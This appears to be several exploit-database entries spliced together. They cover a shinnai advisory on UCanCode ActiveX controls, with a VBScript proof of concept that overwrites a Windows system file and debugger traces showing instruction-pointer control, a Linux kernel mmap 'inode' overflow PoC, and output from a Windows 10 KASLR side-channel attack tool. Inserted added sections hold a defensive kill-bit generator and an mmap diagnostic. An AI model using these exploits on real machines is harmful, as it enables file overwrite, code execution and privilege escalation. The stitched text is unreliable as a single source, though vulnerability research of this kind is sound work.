             ProgID: UCCSIMPLE.UCCSIMPLECtrl.1
             CLSID: {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
             ---------------------------------------------
             and all are marked as: RegKey Safe for Script: True
                                    RegKey Safe for Init: True
                                    Implements IObjectSafety: False
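Added example, not from the advisory: a Python helper that reads the ProgID/CLSID pairs out of the listing above and emits a .reg file setting the Microsoft kill bit (Compatibility Flags 0x400) for each control, which is the standard way to stop Internet Explorer from instantiating a control that is wrongly marked safe for scripting. The listing is copied from the advisory; any Compatibility Flags already present on a host are assumed to be supplied by the caller.

```python
import re
from typing import Dict, Iterable, Optional

KILL_BIT = 0x00000400   # Compatibility Flags bit that blocks instantiation in IE
ACTIVEX_COMPAT = r"SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
WOW6432_COMPAT = r"SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility"
CLSID_RE = re.compile(r"\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}")

# Copied from the advisory's listing of the installed controls.
ADVISORY_LISTING = """
             ProgID: UCCVIEWER.UCCViewerCtrl.1
             CLSID: {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
             ---------------------------------------------
             ProgID: UCCDRAW.UCCDrawCtrl.1
             CLSID: {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
             ---------------------------------------------
             progID: TKDRAWCAD.TKDrawCADCtrl.1
             CLSID: {9022B790-B810-45B4-80BC-2D94EEC5343C}
             ---------------------------------------------
             ProgID: UCCPRINT.UCCPrintCtrl.1
             CLSID: {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
             ---------------------------------------------
             ProgID: UCCDIAGRAM.UCCDiagramCtrl.1
             CLSID: {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
             ---------------------------------------------
             ProgID: UCCUML.UCCUMLCtrl.1
             CLSID: {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
             ---------------------------------------------
             ProgID: UCCHMI.UCCHMICtrl.1
             CLSID: {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
             ---------------------------------------------
             ProgID: UCCSIMPLE.UCCSIMPLECtrl.1
             CLSID: {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
"""


def parse_controls(listing: str) -> Dict[str, str]:
    # Pair each "ProgID:" line with the "CLSID:" line that follows it; the
    # advisory is inconsistent about the capitalisation of "ProgID".
    controls: Dict[str, str] = {}
    progid: Optional[str] = None
    for line in listing.splitlines():
        m = re.match(r"\s*progid:\s*(\S+)", line, re.IGNORECASE)
        if m:
            progid = m.group(1)
            continue
        m = re.match(r"\s*clsid:\s*(\{[0-9A-Fa-f-]+\})", line, re.IGNORECASE)
        if m and progid:
            clsid = m.group(1).upper()
            if not CLSID_RE.fullmatch(clsid):
                raise ValueError("malformed CLSID for %s: %s" % (progid, clsid))
            controls[progid] = clsid
            progid = None
    return controls


def with_kill_bit(flags: int) -> int:
    # OR the bit in so that any flags already present are preserved.
    return flags | KILL_BIT


def kill_bit_set(flags: int) -> bool:
    return (flags & KILL_BIT) == KILL_BIT


def killbit_reg(clsids: Iterable[str], existing: Optional[Dict[str, int]] = None,
                include_wow6432: bool = True) -> str:
    # Build a .reg file (Windows Registry Editor 5.00 syntax) that sets the kill
    # bit for each CLSID. `existing` maps CLSID -> current Compatibility Flags so
    # that other flags are not clobbered. On 64-bit Windows a 32-bit control is
    # looked up under Wow6432Node, so that key is written as well.
    existing = existing or {}
    keys = [ACTIVEX_COMPAT] + ([WOW6432_COMPAT] if include_wow6432 else [])
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        clsid = clsid.upper()
        if not CLSID_RE.fullmatch(clsid):
            raise ValueError("malformed CLSID: %r" % clsid)
        flags = with_kill_bit(existing.get(clsid, 0))
        for key in keys:
            lines.append("[HKEY_LOCAL_MACHINE\\%s\\%s]" % (key, clsid))
            lines.append('"Compatibility Flags"=dword:%08x' % flags)
            lines.append("")
    return "\r\n".join(lines)


if __name__ == "__main__":
    controls = parse_controls(ADVISORY_LISTING)
    print(killbit_reg(controls.values()))
```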

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------
INSECURE METHODS:
In these controls there are a lot of insecure methods which can be used to overwrite
arbitrary files on the user's PC. This is the complete list:

1) various Export* methods

Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE  {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE  {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI  {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI  {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function ExportBitmapData (ByRef phBlob  As Long, ByVal imageShape  As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function ExportToBitmapFile (ByVal lpszFile As String) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------

2) various Save* methods:

----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE  {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI  {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function SaveDocument (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------

3) various Write methods:

----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE  {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI  {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------

PROOF OF CONCEPT:
<html>
 <object classid="clsid:B6A3BF2C-F770-4182-BE7F-103BF2C76826" id="test"></object>
  <script language = "vbscript">
   ' SaveTemplateToFile takes a single string argument (see the UCCDiagram entry above);
   ' the path has to be a quoted VBScript string literal.
   test.SaveTemplateToFile "C:\Windows\_system.ini"
  </script>
</html>

----------------------------------------
----------------------------------------

REMOTE CODE EXECUTION

This product is so poorly coded that remote code execution is possible through a lot of functions (and I'm lazy),
so here is the description of just one of them, "AddDWordUserProperty":

CPU Disasm
Address   Hex dump          Command                                  Comments
...
...
1007FEB5  |.  8D5424 44     LEA EDX,[LOCAL.36]
1007FEB9  |.  51            PUSH ECX
1007FEBA  |.  8B06          MOV EAX,DWORD PTR DS:[ESI] <- WE CAN CONTROL ESI
1007FEBC  |.  52            PUSH EDX
1007FEBD  |.  8BCE          MOV ECX,ESI
1007FEBF  |.  C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0
1007FECA  |.  897C24 10     MOV DWORD PTR SS:[LOCAL.51],EDI
1007FECE  |.  FF90 04030000 CALL DWORD PTR DS:[EAX+304]
1007FED4  |.  85C0          TEST EAX,EAX
...
...
Registers:
CPU - thread 9. (00000B38), module UCCVIE~1_OCX
EAX 015DD1D0
ECX 015DD194
EDX 015DD1D0
EBX 00000000
ESP 015DD188
EBP 015DD300
ESI 41414141 <- FIRST ARGUMENT PASSED TO AddDWordUserProperty METHOD
EDI 42424242 <- SECOND ARGUMENT PASSED TO AddDWordUserProperty METHOD
EIP 1007FEBA UCCVIE~1_OCX.1007FEBA

----------------------------------------------------------------------

We can use it to pass a valid memory address so that we can find a more comfortable situation :)
CPU Disasm
Address   Hex dump          Command                                  Comments
...
...
1007FEB5  |.  8D5424 44     LEA EDX,[LOCAL.36]
1007FEB9  |.  51            PUSH ECX
1007FEBA  |.  8B06          MOV EAX,DWORD PTR DS:[ESI]
1007FEBC  |.  52            PUSH EDX
1007FEBD  |.  8BCE          MOV ECX,ESI
1007FEBF  |.  C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0
1007FECA  |.  897C24 10     MOV DWORD PTR SS:[LOCAL.51],EDI
1007FECE  |.  FF90 04030000 CALL DWORD PTR DS:[EAX+304] <- WE NOW ARE IN CONTROL OF EAX
1007FED4  |.  85C0          TEST EAX,EAX
...
...

Registers
CPU - thread 9. (00000B38), module UCCVIE~1_OCX
EAX 45454545 <- THIS VALUE THAT WAS PREVIOUSLY STORED IN MEMORY, IF WE CHANGE IT IN ANOTHER VALID ADDRESS...
ECX 00030040 ASCII "EEEE"
EDX 015DD1D0
EBX 00000000
ESP 015DD184
EBP 015DD300
ESI 00030040 ASCII "EEEE"
EDI 42424242
EIP 1007FECE UCCVIE~1_OCX.1007FECE
And...
CPU - thread 9. (00000B38)
EAX 0002FDBC
ECX 00030040 ASCII "EEEE"
EDX 015DD1D0
EBX 00000000
ESP 015DD180
EBP 015DD300
ESI 00030040 ASCII "EEEE"
EDI 42424242
EIP 46464646 <- BINGO :)

----------------------------------------
----------------------------------------

BONUS STAGE:
There are a huge number of DoS... happy hunting :)
Peace, your friendly neighborhood shinnai.
---------------------------------------------------------------------
            
/*  Linux Kernel 2.6.32-642 / 3.16.0-4 'inode' Integer Overflow PoC

  The inode is a data structure in a Unix-style file system which describes a filesystem 
  object such as a file or a directory. Each inode stores the attributes and disk block 
  locations of the object's data. Filesystem object attributes may include metadata, as 
  well as owner and permission data.

  INODE can be overflowed by mapping a single file too many times, allowing for a local 
  user to possibly gain root access.

  Disclaimer:
  This program, like the previous ones, is for educational purposes ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any 
  damages caused by direct or indirect use of the information or functionality provided 
  by these programs. The author or any Internet provider bears NO responsibility for content 
  or misuse of these programs or any derivatives thereof. By using these programs you accept 
  the fact that any damage (data loss, system crash, system compromise, etc.) caused by the use 
  of these programs is not Todor Donev's responsibility.

  Thanks to Maya Hristova and all friends.

  Suggestions, comments and job offers are welcome!
  
  Copyright 2016 (c) Todor Donev
  Varna, Bulgaria
  todor.donev@gmail.com
  https://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg
  http://pastebin.com/u/hackerscommunity  

*/
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(void)
{
    int fd, i;

    /* /dev/zero is the single file that gets mapped 26999 times. */
    fd = open("/dev/zero", O_RDONLY);
    if (fd < 0)
        return 1;

    /* One-byte (one-page) shared, read-only mappings at fixed addresses,
     * 64 KiB apart, starting from address 0. Return values are deliberately
     * not checked; on kernels with vm.mmap_min_addr > 0 the lowest
     * addresses are refused and those iterations simply do nothing. */
    for (i = 0; i < 26999; i++) {
        mmap((char *)0x00000000 + (0x10000 * i), 1, PROT_READ,
             MAP_SHARED | MAP_FIXED, fd, 0);
    }
    return 0;
}
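The PoC above maps one file thousands of times without looking at a single return value, so it gives no way to tell how many VMAs were actually created or which call failed first. The following C program is an added example, not Todor Donev's code: it parses /proc/<pid>/maps text and counts the VMAs backed by a given path (a constructed sample listing is embedded so the parser can be checked offline), maps /dev/zero a requested number of times at kernel-chosen addresses while checking every mmap call, and then counts its own mappings. Two facts it relies on: shared mappings of /dev/zero are backed by a fresh shmem inode and are listed as "/dev/zero (deleted)", and the per-process VMA limit is vm.max_map_count (65530 by default), beyond which mmap fails with ENOMEM.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Constructed sample of /proc/<pid>/maps output (not captured from a real
 * system). Shared /dev/zero mappings show up as "/dev/zero (deleted)". */
static const char SAMPLE_MAPS[] =
    "00400000-00401000 r-xp 00000000 08:01 1311                       /tmp/poc\n"
    "7f0000010000-7f0000011000 r--s 00000000 00:05 6                  /dev/zero (deleted)\n"
    "7f0000020000-7f0000021000 r--s 00000000 00:05 6                  /dev/zero (deleted)\n"
    "7ffd12340000-7ffd12361000 rw-p 00000000 00:00 0                  [stack]\n";

/* Columns: start-end perms offset dev inode [path]; return the path or NULL. */
static const char *path_field(const char *line, const char *end)
{
    const char *p = line;
    for (int field = 0; field < 5; field++) {
        while (p < end && *p != ' ' && *p != '\t') p++;   /* skip the field  */
        while (p < end && (*p == ' ' || *p == '\t')) p++; /* skip separators */
    }
    return p < end ? p : NULL;
}

/* Count VMAs whose path is 'path', optionally followed by a space-separated
 * suffix such as "(deleted)". A longer path like "/dev/zeroes" does not match. */
int count_mappings_of(const char *maps_text, const char *path)
{
    size_t plen = strlen(path);
    int n = 0;
    for (const char *line = maps_text; *line; ) {
        const char *nl = strchr(line, '\n');
        const char *end = nl ? nl : line + strlen(line);
        const char *p = path_field(line, end);
        if (p && (size_t)(end - p) >= plen && strncmp(p, path, plen) == 0 &&
            (p + plen == end || p[plen] == ' '))
            n++;
        line = nl ? nl + 1 : end;
    }
    return n;
}

/* Map 'path' 'count' times, one page each, at kernel-chosen addresses, checking
 * every return value. Returns the number of successful mappings, or -1 if the
 * file cannot be opened; the errno of the first failure (ENOMEM once
 * vm.max_map_count is reached) is stored in *err. */
int map_repeatedly(const char *path, int count, int *err)
{
    *err = 0;
    int fd = open(path, O_RDONLY);
    if (fd < 0) { *err = errno; return -1; }
    int ok = 0;
    for (int i = 0; i < count; i++) {
        void *p = mmap(NULL, 1, PROT_READ, MAP_SHARED, fd, 0);
        if (p == MAP_FAILED) { *err = errno; break; }
        ok++;
    }
    close(fd);
    return ok;
}

/* Read this process's own maps file into buf; returns bytes read or -1. */
long read_self_maps(char *buf, size_t cap)
{
    int fd = open("/proc/self/maps", O_RDONLY);
    if (fd < 0) return -1;
    size_t total = 0;
    ssize_t r;
    while (total < cap - 1 && (r = read(fd, buf + total, cap - 1 - total)) > 0)
        total += (size_t)r;
    close(fd);
    buf[total] = '\0';
    return (long)total;
}

int main(void)
{
    static char buf[1 << 20];
    int err;
    printf("sample listing: %d mappings of /dev/zero\n",
           count_mappings_of(SAMPLE_MAPS, "/dev/zero"));
    int n = map_repeatedly("/dev/zero", 64, &err);
    printf("mapped /dev/zero %d times (errno %d: %s)\n",
           n, err, err ? strerror(err) : "none");
    if (read_self_maps(buf, sizeof buf) > 0)
        printf("/proc/self/maps now lists %d /dev/zero VMAs\n",
               count_mappings_of(buf, "/dev/zero"));
    return 0;
}
```

Raising the count argument toward vm.max_map_count (cat /proc/sys/vm/max_map_count) shows where mmap starts returning ENOMEM on a given kernel, which is the check to run before trusting what an unchecked loop like the PoC's has done.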
            
Complete Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40823.zip

Presentation:
https://www.exploit-db.com/docs/english/40822-i-know-where-your-page-lives---de-randomizing-the-latest-windows-10-kernel.pdf


I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016

Requirements

Intel Processor (Haswell or newer)
Windows 10 x64
Usage

Run ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:

C:\Users\qa\Desktop>ASLRSideChannelAttack.exe
+] Setting thread affinity to CPU 0
+] Getting all the potential PML4 SelfRef
+] Mapping a page oracle
+] Allocating probing target pages...
Allocation 0: 0000020E339D0000
Allocation 1: 0000020E339E0000
Allocation 2: 0000020E339F0000
Allocation 3: 0000020E33A00000
Allocation 4: 0000020E33A10000
--------------------------
+] Check that Unammped and Mapped values are consistent across several executions!
--------------------------
Unmapped Initial: 256.683746
Mapped Initial: 203.692978
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 247.440018
Mapped: 202.827560
--------------------------

Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213
+] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563
+] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382
+] PTE FFFF81010719D000 looks mapped! - Time: 197.297256
+] PTE FFFF81010719D080 looks mapped! - Time: 194.501175
+] PTE FFFF810804020100 looks mapped! - Time: 204.740097
+] Removing 102 from initial array and pushing it into final array
Potential SelfRef: FFFF81C0E0703818
+] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616
+] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774
+] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921
+] PTE FFFF81810719D000 looks mapped! - Time: 202.525726
+] PTE FFFF81810719D080 looks mapped! - Time: 208.673874
Time difference exceed for ffff818804020100, retrying...
+] PTE FFFF818804020100 looks mapped! - Time: 209.071213
+] Removing 103 from initial array and pushing it into final array
Time difference exceed for ffff824120904820, retrying...
Potential SelfRef: FFFF824120904820
+] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642
Time difference exceed for ffff82010719cf00, retrying...
+] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593
+] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344
+] PTE FFFF82010719D000 looks mapped! - Time: 207.820862
+] PTE FFFF82010719D080 looks mapped! - Time: 197.229263
+] PTE FFFF820804020100 looks mapped! - Time: 204.585739
+] Removing 104 from initial array and pushing it into final array
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003
Time difference exceed for ffff8341a0d06830, retrying...
Potential SelfRef: FFFF8341A0D06830
+] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657
+] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697
+] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016
+] PTE FFFF83010719D000 looks mapped! - Time: 214.013504
+] PTE FFFF83010719D080 looks mapped! - Time: 191.688126
+] PTE FFFF830804020100 looks mapped! - Time: 193.314758
+] Removing 106 from initial array and pushing it into final array
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973
+] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693
+] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097
+] PTE FFFF83810719D000 looks mapped! - Time: 216.298660
+] PTE FFFF83810719D080 looks mapped! - Time: 203.848816
+] PTE FFFF838804020100 looks mapped! - Time: 204.008743
+] Removing 107 from initial array and pushing it into final array
Time difference exceed for ffff89c4e2713898, retrying...
Time difference exceed for ffff8bc5e2f178b8, retrying...
Time difference exceed for ffff8c46231188c0, retrying...
Unmapped Initial: 248.508636
Mapped Initial: 207.139847
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 236.360733
Mapped: 195.650040
--------------------------

Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363
Potential SelfRef: FFFF81C0E0703818
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
